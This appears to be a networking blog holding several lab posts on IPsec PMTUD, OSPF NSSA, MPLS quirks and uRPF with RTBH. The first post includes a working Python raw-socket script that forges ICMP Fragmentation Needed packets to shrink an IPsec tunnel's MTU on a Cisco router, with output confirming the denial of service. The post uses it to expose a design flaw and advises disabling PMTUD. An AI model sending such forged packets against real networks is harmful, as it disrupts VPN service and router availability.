IPsec is a well-established technology for building VPN tunnels between sites. Path MTU discovery (PMTUD) is a feature that provides end hosts and VPN head ends visibility into intermediate MTU along the path so that they could adjust their own MTU accordingly. Is it possible to use the two features simultaneously? Sure, there is even an article from Cisco that walks a reader through the operation step by step. Should the two features be used simultaneously? That’s the case I would like to cover in this article.
IPsec VPNs are predominantly security-oriented – there are a number of features to ensure the CIA triad (confidentiality, integrity, availability). IPsec device usually builds its tunnels over the Internet, so it has to withstand the attention of bad actors by design: the cost of the attack must be higher than the gain from it – that’s the idea that security is built upon. If you look closely at PMTUD over IPsec description, you would notice one peculiar aspect – the decision about a protected entity (MTU of the IPsec tunnel) is based on completely arbitrary feedback from the intermediate network (ICMP fragmentation needed). Is it possible to craft an ICMP packet that would decrease the MTU value to an unacceptable value?
Here is the topology we would use today for testing:
Most of the routers are running a rather common IOS image for 7200 – 15.2(4)M11. VPN4, however, is a newer platform CSR1000v, running IOS XE 16.9.3, which we would put under pressure. Attacker is an Ubuntu host that is going to forge ICMP replies. For the purpose of this lab both VPN head ends have PMTUD enabled. The real MTU restriction is on the link between VPN2 and ISP, so we would be able to validate PMTUD operation prior to meddling with VPN4. Here are the configuration lines for each of the device:
H1#show run | section router|interface
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
VPN2#show run | section router|ip route|crypto|interface
crypto isakmp policy 10
authentication pre-share
crypto isakmp key cisco address 0.0.0.0
crypto ipsec transform-set SET esp-aes
mode tunnel
crypto ipsec profile PROFILE
set transform-set SET
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface Tunnel0
ip address 192.168.24.2 255.255.255.0
ip ospf mtu-ignore
tunnel source FastEthernet0/1
tunnel mode ipsec ipv4
tunnel destination 192.168.34.4
tunnel path-mtu-discovery
tunnel protection ipsec profile PROFILE
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
ip mtu 1400
ip ospf shutdown
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.34.4 255.255.255.255 192.168.23.3
ISP#show run | section interface
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.100.3 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.3 255.255.255.0
ip mtu 1400
interface FastEthernet1/0
ip address 192.168.34.3 255.255.255.0
VPN4#show run | section router|ip route|interface|crypto
crypto isakmp policy 10
authentication pre-share
crypto isakmp key cisco address 0.0.0.0
crypto ipsec transform-set SET esp-aes
mode tunnel
crypto ipsec profile PROFILE
set transform-set SET
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface Tunnel0
ip address 192.168.24.4 255.255.255.0
ip ospf mtu-ignore
tunnel source GigabitEthernet2
tunnel mode ipsec ipv4
tunnel destination 192.168.23.2
tunnel path-mtu-discovery
tunnel protection ipsec profile PROFILE
interface GigabitEthernet1
ip address 192.168.45.4 255.255.255.0
interface GigabitEthernet2
ip address 192.168.34.4 255.255.255.0
ip ospf shutdown
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.23.2 255.255.255.255 192.168.34.3
H5#show run | section router|interface
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
ip address 192.168.45.5 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
root@Attacker# tunctl -t tap0
root@Attacker# ifconfig tap0 192.168.100.10/24 up
root@Attacker# ip route add 192.168.34.0/24 via 192.168.100.3
Why is the ip ospf mtu-ignore command there on the tunnel interface? PMTUD is a unidirectional feature, so it is pretty possible that one VPN head end would already decrease its MTU while its peer is just about to uncover the restriction. If OSPF neighbourship is reset in such unfortunate circumstances, it cannot be restored by default due to MTU mismatch in DBD packets.
Before we run any tests, let’s start the packet capture between ISP and VPN4 – our little emulation of attacker’s reconnaissance. We’re interested only in ICMP packets at this point. PMTUD is performed by the packets with DF-bit set:
H5#ping 1.1.1.1 source 5.5.5.5 size 1400 df-bit
Type escape sequence to abort.
Sending 5, 1400-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
.M.M.
Success rate is 0 percent (0/5)
H5#
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/46/52 ms
VPN4#show interface tunnel 0
Tunnel0 is up, line protocol is up
<output omitted>
Tunnel protocol/transport IPSEC/IP
Tunnel TTL 255
Path MTU Discovery, ager 10 mins, min MTU 92, MTU 1342, expires 00:09:28
Tunnel transport MTU 1442 bytes
Tunnel transmit bandwidth 8000 (kbps)
Tunnel receive bandwidth 8000 (kbps)
Tunnel protection via IPSec (profile "PROFILE")
<output omitted>
Good news – PMTUD is indeed operational: tunnel MTU is decreased to 1342 bytes. Beware, though: older IOS software does not show the MTU value in use:
Note: This change in value is stored internally and cannot be seen in the output of the show ip interface tunnel<#> command. You only see this change if you turn use the debug tunnel command.
Remember that ICMP Fragmentation Needed carries a part of the offending packet, so we might need it to forge our own ICMP reply:
Only ESP headers are included in ICMP, so the Attacker can intercept the packets and infer SPI and Sequence values – that should be enough to construct a packet that looks and feels legitimate. However, our task is even simpler: it is enough to trick VPN4 into decreasing MTU value significantly. Since a good engineer is a lazy engineer, we could just copy the contents of an intercepted ICMP reply and modify it accordingly:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
packet = bytearray(\
b"\x0c\x11\x72\x9e\x00\x01\xca\x03\x3c\xde\x00\x1c\x08\x00\x45\x00" \
b"\x00\x38\x00\x02\x00\x00\xff\x01\xf6\x6a\xc0\xa8\x22\x03\xc0\xa8" \
b"\x22\x04\x03\x04\xb2\x44\x00\x00\x05\x78\x45\x00\x05\xac\x04\xb3" \
b"\x40\x00\xfe\x32\xb8\x15\xc0\xa8\x22\x04\xc0\xa8\x17\x02\x5a\xe2" \
b"\xea\x4e\x00\x00\x00\x0e"
)
# Decrease MTU by 1024 bytes
packet[2*16 + 8] = (packet[2*16 + 8] - 0x04) % 256
# Compute high byte of checksum word
hbyte = packet[2*16 + 4] + 0x04
# If high byte is overflown, compensate carryover
if hbyte > 255:
packet[2*16 + 5] = packet[2*16 + 5] + 1
hbyte -= 256
# Adjust high byte of checksum
packet[2*16 + 4] = hbyte
packet = packet[14:]
s.sendto(packet, ('192.168.34.4', 0))
Checksum adjustment involves a bit of ancient magic in case of the carryover, though the idea itself is simple – decrease the LSB of MTU while increasing LSB of Checksum. Quite straightforward, isn’t it? Let’s see whether it has any effect:
root@Attacker# python3 pckt.py
VPN4#show interfaces tunnel0 Tunnel0 is up, line protocol is up <output omitted> Tunnel protocol/transport IPSEC/IP Tunnel TTL 255 Path MTU Discovery, ager 10 mins, min MTU 92, MTU 318, expires 00:09:48 Tunnel transport MTU 1442 bytes Tunnel transmit bandwidth 8000 (kbps) Tunnel receive bandwidth 8000 (kbps) Tunnel protection via IPSec (profile "PROFILE") <output omitted>
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit Type escape sequence to abort. Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds: Packet sent with a source address of 5.5.5.5 Packet sent with the DF bit set M.M.M Success rate is 0 percent (0/5)
Evidently, the attack is successful. Implications? Well, for starters, packets with DF-bit cannot make it through, so the availability of VPN service is impacted. The regular packets would still get fragmented and sent over the IPsec tunnel. The fragmentation is always done by CPU though, so the spike of fragmented packets would result in CPU spike; in such a case router availability would be at risk, potentially denying the service altogether to the whole site.
Is it a defect though? Unfortunately, it is not a bug to be fixed, but a flaw in the feature design: router has to trust unauthenticated packets from an arbitrary source within the transit network. Even if ICMP reply included some part of ESP payload with any anti-replay protection, ICV value would most likely be omitted, thus sacrificing ESP integrity check. In the end, the only way to avoid such an attack is to disable PMTUD on the tunnel and configure MTU manually. Luckily, most of the paths in the modern Internet can cope with default MTU of 1500, so static MTU for a tunnel should perform fine.
There are quite a few blogposts on the Internet, explaining that complex OSPF setup is usually more complicated than it’s worth. One of the quirks, contributing to such overcomplication, is not-so-stubby area (NSSA). If you’re not yet convinced by the naming of the feature, take a look at this post by Ivan Pepelnjak. Still interested? I’ve got one more example for you that might divert your design decision to BGP for complex scenarios.
Here is a sample topology:
Area 1 is NSSA, so both R1 and R2 are ABRs. R1 is also ASBR that redistributes 1.1.1.1/32 prefix. All links have default cost of 1 with a single exception – R1-R2 acts as backup so it has an increased cost of 10. Here is the basic config for such a setup:
R1#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
ip ospf 1 area 1
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.13.1 255.255.255.0
ip ospf 1 area 0
router ospf 1
router-id 1.1.1.1
area 1 nssa
redistribute connected subnets
R2#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
ip ospf 1 area 1
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.24.2 255.255.255.0
router ospf 1
router-id 2.2.2.2
area 1 nssa
network 0.0.0.0 255.255.255.255 area 0
R3#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.34.3 255.255.255.0
interface FastEthernet0/1
ip address 192.168.13.3 255.255.255.0
router ospf 1
router-id 3.3.3.3
network 0.0.0.0 255.255.255.255 area 0
R4#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 192.168.34.4 255.255.255.0
interface FastEthernet0/1
ip address 192.168.24.4 255.255.255.0
router ospf 1
router-id 4.4.4.4
network 0.0.0.0 255.255.255.255 area 0
R4 should have two paths to 1.1.1.1/32:
the primary one through R3 due to LSA5, originated by R1;
the backup one through R2 due to LSA5, originated by R2 based on LSA7 contents.
However, that’s not the case:
R4#show ip os database | begin Type-5
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
1.1.1.1 1.1.1.1 876 0x80000002 0x0099FD 0
Maybe the LSAs are considered functionally equivalent? Unlikely, since LSA5 from R1 should have lost to the competition (1.1.1.1 is lower than 2.2.2.2). Well, let’s check the connectivity first:
R4#traceroute 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.3 48 msec 44 msec 52 msec
2 192.168.13.1 44 msec 48 msec 48 msec
The primary path is definitely operational, so let’s verify that the backup one would kick in properly:
R4#ping 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4
.....
Success rate is 0 percent (0/5)
R4#
R4#show ip route 1.1.1.1
% Network not in table
As you can see, there is no backup route at all! There is also sickening void in LSDB as well:
R4#show ip ospf database
OSPF Router with ID (4.4.4.4) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 1186 0x80000005 0x0092A2 1
2.2.2.2 2.2.2.2 1437 0x80000006 0x006991 2
3.3.3.3 3.3.3.3 90 0x80000007 0x0032A8 2
4.4.4.4 4.4.4.4 1293 0x80000004 0x00AD0A 3
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.13.1 1.1.1.1 1186 0x80000004 0x00E8C2
192.168.24.2 2.2.2.2 1437 0x80000002 0x009FF5
192.168.34.3 3.3.3.3 1357 0x80000002 0x002B57
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.12.0 1.1.1.1 1446 0x80000002 0x009721
192.168.12.0 2.2.2.2 1437 0x80000003 0x00773C
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
1.1.1.1 1.1.1.1 1446 0x80000002 0x0099FD 0
Note that LSAs from R1 are not flushed by other routers in the area. However, the graph is disjoined (there is no bidirectional edge between R1 and R3), so 1.1.1.1/32 is considered unreachable through R3. If you’d like more information on OSPF graph computation process, check out this post. However, the main mystery is not solved yet.
There will be no salvation though: LSA5 will never get generated by R2 according to RFC 1587 (same holds true for RFC 3101 as well):
If a router is attached to another AS and is also an NSSA area border router, it may originate a both a type-5 and a type-7 LSA for the same network. The type-5 LSA will be flooded to the backbone (and all attached type-5 capable areas) and the type-7 will be flooded into the NSSA. If this is the case, the P-bit must be reset in the type-7 NSSA so the type-7 LSA isn’t again translated into a type-5 LSA by another NSSA area border router.
As you could have already guessed, that’s exactly our case (No Type 7/5 translation option):
R2#show ip ospf database nssa-external
OSPF Router with ID (2.2.2.2) (Process ID 1)
Type-7 AS External Link States (Area 1)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 248
Options: (No TOS-capability, No Type 7/5 translation, DC, Upward)
LS Type: AS External Link
Link State ID: 1.1.1.1 (External Network Number )
Advertising Router: 1.1.1.1
LS Seq Number: 80000005
Checksum: 0x771B
Length: 36
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
MTID: 0
Metric: 20
Forward Address: 0.0.0.0
External Route Tag: 0
Conclusion? Don’t make the complex protocol even more complicated. If it’s an absolute must, then stick to the designs, published by vendors, test everything you can lay your hands on and don’t deviate from the two points above – vendor support and infrastructure availability are at stake here.
If you have ever worked with MPLS either in a lab or in production, you should have noticed that the technology itself is fairly straightforward. However, there are quite a few quirks that might make life more difficult than it has to be. Most of those peculiar aspects are extensively discussed by Pleiades of posts on the net, but not all of them, unfortunately. Today I’d like to make a humble contribution. to the knowledge base of a few less known/described features that do not really warrant a separate post but are interesting nevertheless.
The topology is utterly straightforward:
MPLS is deployed within ISP just for traffic encapsulation – no typical use case (L3VPN, TE, etc.) is active here. IGP is vanilla OSPF while the purpose for the several areas is to allow some minor routing manipulation on PEs. Below you could find the initial configs:
CE1#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface Loopback1
ip address 1.1.2.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
router ospf 1
router-id 1.1.1.1
network 0.0.0.0 255.255.255.255 area 1
PE1#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
ip ospf 1 area 1
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
router ospf 1
mpls ldp autoconfig area 0
router-id 2.2.2.2
area 1 range 1.1.1.0 255.255.255.0
network 0.0.0.0 255.255.255.255 area 0
P#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
ip address 192.168.23.3 255.255.255.0
interface FastEthernet1/0
ip address 192.168.34.3 255.255.255.0
router ospf 1
mpls ldp autoconfig
router-id 3.3.3.3
network 0.0.0.0 255.255.255.255 area 0
PE2#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 192.168.45.4 255.255.255.0
ip ospf 1 area 2
interface FastEthernet1/0
ip address 192.168.34.4 255.255.255.0
router ospf 1
mpls ldp autoconfig area 0
network 0.0.0.0 255.255.255.255 area 0
CE2#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
ip address 192.168.45.5 255.255.255.0
router ospf 1
router-id 5.5.5.5
network 0.0.0.0 255.255.255.255 area 2
Story 1: PHP confession
The theory behind penultimate hop popping (PHP) is widely known and described; here is a good recap if you feel rusty. However, most of the authors omit several important details to make the introduction to the topic easier.
Labels are allocated by LDP for all prefixes except the ones received from BGP. In the latter case BGP is the protocol responsible for label allocation, be it VPNv4 AF, labelled unicast or any other relevant application.
Although PHP removes a lookup in a general case, implicit-null label applies only to connected and aggregated routes, the transit one are still allocated a corresponding label. The reason is simple: both connected and aggregated routes require a lookup anyway, while transit routes can be forwarded further based on the label.
Let’s verify that last statement in our lab:
CE2#show ip route ospf
<output omitted>
1.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
O IA 1.1.1.0/24 [110/5] via 192.168.45.4, 00:07:20, FastEthernet0/0
O IA 1.1.2.1/32 [110/5] via 192.168.45.4, 00:05:26, FastEthernet0/0
2.0.0.0/32 is subnetted, 1 subnets
O IA 2.2.2.2 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
3.0.0.0/32 is subnetted, 1 subnets
O IA 3.3.3.3 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
4.0.0.0/32 is subnetted, 1 subnets
O IA 4.4.4.4 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA 192.168.12.0/24 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA 192.168.23.0/24 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA 192.168.34.0/24 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
CE2#
CE2#traceroute 1.1.1.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.45.4 12 msec 12 msec 8 msec
2 192.168.34.3 [MPLS: Label 23 Exp 0] 48 msec 12 msec 32 msec
3 192.168.23.2 68 msec 36 msec 40 msec
4 192.168.12.1 76 msec 96 msec 44 msec
CE2#
CE2#traceroute 192.168.12.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 192.168.12.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.45.4 8 msec 16 msec 12 msec
2 192.168.34.3 [MPLS: Label 19 Exp 0] 12 msec 32 msec 28 msec
3 192.168.23.2 64 msec 44 msec 44 msec
4 192.168.12.1 56 msec 48 msec 60 msec
CE2#
CE2#traceroute 1.1.2.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.2.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.45.4 16 msec 20 msec 20 msec
2 192.168.34.3 [MPLS: Label 24 Exp 0] 52 msec 64 msec 56 msec
3 192.168.23.2 [MPLS: Label 23 Exp 0] 64 msec 48 msec 64 msec
4 192.168.12.1 100 msec 80 msec 84 msec
Note that the allocated labels are different due to per-prefix label allocation. Connected routes require a lookup, since it’s not possible to infer the next-hop and corresponding L2 information from the ingress label; the same is valid for the summary as well. The packet towards 1.1.2.1/32, however, can be forwarded to its next-hop immediately:
PE1#show mpls forwarding-table 1.1.1.0 24 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
None No Label 1.1.1.0/24 0 punt
MAC/Encaps=0/0, MRU=0, Label Stack{}
No output feature configured
PE1#
PE1#show mpls forwarding-table 192.168.12.0 24 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
None No Label 192.168.12.0/24 0 punt
MAC/Encaps=0/0, MRU=0, Label Stack{}
No output feature configured
PE1#
PE1#show mpls forwarding-table 1.1.2.1 32 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
23 No Label 1.1.2.1/32 672 Fa0/0 192.168.12.1
MAC/Encaps=14/14, MRU=1504, Label Stack{}
CA010BDB0008CA020BDF00080800
No output feature configured
Story 2: peculiar loopback
Another curious behaviour is connected with “misconfiguring” loopback subnet mask. It is widely accepted that loopback should have /32 mask. Indeed, why waste precious addressing space? However, my hand has slipped several times to configure familiar /24 mask in a lab. The consequences might be sometimes difficult to grasp and troubleshoot. Let’s make a change to our topology:
The reason for the outage is the absence of relevant label on P. It could be that the route is not propagating correctly:
P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes
<output omitted>
2.0.0.0/32 is subnetted, 1 subnets
O 2.2.2.2 [110/2] via 192.168.23.2, 01:24:24, FastEthernet0/1
P#
P#show ip cef 2.2.2.2/32 detail
2.2.2.2/32, epoch 0
local label info: global/16
nexthop 192.168.23.2 FastEthernet0/1
No, it’s exactly as we’ve intended it to be, except for the lack of label in the CEF output. Labels are distributed by LDP, so let’s check what we receive from PE1 on P:
The label for 2.2.2.0/24 is correctly listed as implicit-null. Have you noticed anything off by now?
P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes
<output omitted>
2.0.0.0/32 is subnetted, 1 subnets
O 2.2.2.2 [110/2] via 192.168.23.2, 01:30:17, FastEthernet0/1
P#
P#show mpls ldp bindings 2.2.2.0 24
lib entry: 2.2.2.0/24, rev 28
remote binding: lsr: 2.2.2.2:0, label: imp-null
The subnet masks do not match! OSPF ignores non-host masks on loopbacks by default and announces loopback addresses as /32. However, LDP plays by the sensible rules and distributes /24 as configured. P cannot match prefix in RIB to the binding in LIB, hence the lack of outgoing label. Fix is fairly simple if you played with OSPF long enough:
Overlay VPN setups typically employ loopbacks as BGP next-hops. Besides obvious reasons like load-balancing, transport resiliency and such, there is a more stringent requirement why one cannot use physical interface as L3VPN headend – PHP. Take our topology as an example. PE2, that is located one hop away from PE1, would not swap transport label towards 192.168.23.2 for some value but it would instead pop it, because P announces implicit-null for its connected route.
PE2#traceroute 192.168.23.2 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.3 20 msec 24 msec 12 msec
2 192.168.23.2 8 msec 28 msec 24 msec
As a result, if it were L3VPN setup, P would receive the packet with VPN label on top, so it would either drop the packet or you might experience the most fascinating forwarding that Hogwarts can provide.
What if you cannot use a loopback for peering? To be honest, I cannot think of a valid reason for such a case, except for some weird CCIE lab, so this is purely an abstract discussion. Anyway, you must ensure that PE1 interface IP is not recognized by P as directly connected. Newer IOS images do include /32 into RIB, called Local route, but these routes are not announced by OSPF. However, OSPF does announce interface /32 addresses in P2M scenario:
Voila! OSPF RIB entry and LDP bindings are both created, so LSP is functional again:
P#show mpls forwarding-table 192.168.23.2 32 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
17 Pop Label 192.168.23.2/32 252 Fa0/1 192.168.23.2
MAC/Encaps=14/14, MRU=1504, Label Stack{}
CA020BDF0006CA030BFB00068847
No output feature configured
PE2#traceroute 192.168.23.2 source lo 0
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.3 [MPLS: Label 17 Exp 0] 4 msec 16 msec 8 msec
2 192.168.23.2 12 msec 32 msec 28 msec
Conclusion
In this article we’ve discussed several aspects of generic MPLS setup: PHP operation, loopback misconfig with OSPF, consequences of such a mischief as well as CCIE lab maniac scenario. I hope you’ve enjoyed it, so stay tuned for more!
There are quite a few articles in the wild, explaining the Unicast Reverse Path Forwarding (uRPF) feature and its two modes: strict and loose. Although the operational difference between the two modes is the primary focus of such posts, they rarely cover why these two flavours exist in the first place, at least under the Google search for “loose vs strict uRPF”. Today I’d like to close such a gap and highlight the connection between loose uRPF and the yet unknown feature.
Before we start discussing the modes, a quick recap is in order. RPF is a feature from the multicast world that prevents loops in the data plane: it compares the source address of IP packet to the RIB; if the ingress interface matches the route towards the source address, packet is forwarded further, otherwise it’s a loop and the packet is discarded. Unicast RPF stems from the same idea – verify that the packet comes from a valid direction. Strict uRPF operates in the same way as its counterpart from the multicast feature set; loose uRPF, however, does not check the interface – just the availability of a valid route. There is a single notable exception to such a description though: if next-hop interface for the source address is Null0, the packet is also discarded. Cisco provides the use case for the feature as well:
To provide ISPs with a DDoS resistance tool on the ISP-to-ISP edge of a network, Unicast RPF was modified from its original strict mode implementation to check the source addresses of each ingress packet without regard for the specific interface on which it was received. This modification is known as “loose mode.”
Does the ISP-to-ISP DDoS protection sound familiar? It is indeed part of the Remotely Triggered Blackhole (RTBH). The destination-based RTBH uses BGP communities to notify ISP which destination is under attack, so that the ISP can temporarily drop offending traffic. Obviously, the legitimate traffic is discarded too in such a case. Wouldn’t it be better if the traffic could be dropped based on the offending source IP? This is exactly the use case for the source-based RTBH: if loose uRPF is added to the destination-based RTBH setup, attacker’s IP address can be marked by BGP community and further forwarded to the void. Here is a nice article on the RTBH that explains the solution, using IOS XR platform.
Disclaimer: there wil be no extra revelations further down the text, so if you already grasped the idea, feel free to skip the rest of the post.
Let’s build a simple topology to verify the loose uRPF within the RTBH feature:
ISP network consists of 2 PE routers that are using the same BGP AS. CE1 and CE2 are customer routers that peer with ISP using eBGP. Important note: IOS XE requires that a directly connected eBGP neighbour and its prefixes are reachable via the same physical egress interface, otherwise, the received routes are considered inaccessible. The workaround is simple though – disable-connected-check on PE, that performs next-hop replacement. Here is the basic routing and addressing config:
CE1#show run | section interface|router|ip route
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.13.3 255.255.255.0
router bgp 3
bgp router-id 3.3.3.3
no bgp default ipv4-unicast
neighbor 192.168.13.1 remote-as 12
address-family ipv4
network 3.3.3.3 mask 255.255.255.255
neighbor 192.168.13.1 activate
neighbor 192.168.13.1 send-community both
CE2#show run | section interface|router
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 192.168.24.4 255.255.255.0
router bgp 4
bgp router-id 4.4.4.4
no bgp default ipv4-unicast
neighbor 192.168.24.2 remote-as 12
address-family ipv4
network 4.4.4.4 mask 255.255.255.255
neighbor 192.168.24.2 activate
neighbor 192.168.24.2 send-community both
PE1#show run | section interface|router
interface Loopback0
ip address 1.1.1.1 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.13.1 255.255.255.0
interface FastEthernet1/0
ip address 192.168.12.1 255.255.255.0
ip ospf 1 area 0
router ospf 1
router-id 1.1.1.1
router bgp 12
bgp router-id 1.1.1.1
no bgp default ipv4-unicast
neighbor 2.2.2.2 remote-as 12
neighbor 2.2.2.2 update-source Loopback0
neighbor 192.168.13.3 remote-as 3
neighbor 192.168.13.3 disable-connected-check
!
address-family ipv4
redistribute connected
neighbor 2.2.2.2 activate
neighbor 2.2.2.2 send-community both
neighbor 192.168.13.3 activate
neighbor 192.168.13.3 send-community both
PE2#show run | section interface|router
interface Loopback0
ip address 2.2.2.2 255.255.255.255
ip ospf 1 area 0
interface FastEthernet0/0
ip address 192.168.24.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.25.2 255.255.255.0
interface FastEthernet1/0
ip address 192.168.12.2 255.255.255.0
ip ospf 1 area 0
router ospf 1
router-id 2.2.2.2
router bgp 12
bgp router-id 2.2.2.2
no bgp default ipv4-unicast
neighbor 1.1.1.1 remote-as 12
neighbor 1.1.1.1 update-source Loopback0
neighbor 192.168.24.4 remote-as 4
neighbor 192.168.25.5 remote-as 5
!
address-family ipv4
redistribute connected
neighbor 1.1.1.1 activate
neighbor 1.1.1.1 send-community
neighbor 192.168.24.4 activate
neighbor 192.168.24.4 send-community both
neighbor 192.168.25.5 activate
neighbor 192.168.25.5 send-community both
Attacker#show run | section interface|router
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/1
ip address 192.168.25.5 255.255.255.0
router bgp 5
bgp router-id 5.5.5.5
no bgp default ipv4-unicast
neighbor 192.168.25.2 remote-as 12
address-family ipv4
network 5.5.5.5 mask 255.255.255.255
neighbor 192.168.25.2 activate
neighbor 192.168.25.2 send-community both
First, let’s implement destination-based RTBH. Community of 12:666 would be the marker to discard the traffic through Null0.
PE1#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
address-family ipv4
neighbor 192.168.13.3 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
match community RTBH
set local-preference 200
set ip next-hop 10.0.0.0
route-map RTBH permit 20
PE2#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
address-family ipv4
neighbor 192.168.24.4 route-map RTBH in
neighbor 192.168.25.5 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
match community RTBH
set local-preference 200
set ip next-hop 10.0.0.0
route-map RTBH permit 20
Attacker has initiated the DDoS attack on CE1 3.3.3.3/32:
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/48/52 ms
In order to block the offending traffic, CE1 has to announce 3.3.3.3/32 with community of 12:666.
CE1#show run | section route-map|router bgp
router bgp 3
address-family ipv4
network 3.3.3.3 mask 255.255.255.255 route-map RTBH
route-map RTBH permit 10
set community 12:666
The attack has ceased on PE2 due to the data plane filter:
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
UUUUU
Success rate is 0 percent (0/5)
The important feature of RTBH – traffic is discarded as soon as possible on provider edge, thus limiting the impact on the ISP network.
PE2#show ip bgp 3.3.3.3/32
BGP routing table entry for 3.3.3.3/32, version 27
Paths: (1 available, best #1, table default)
Advertised to update-groups:
3
Refresh Epoch 2
3
10.0.0.0 from 1.1.1.1 (1.1.1.1)
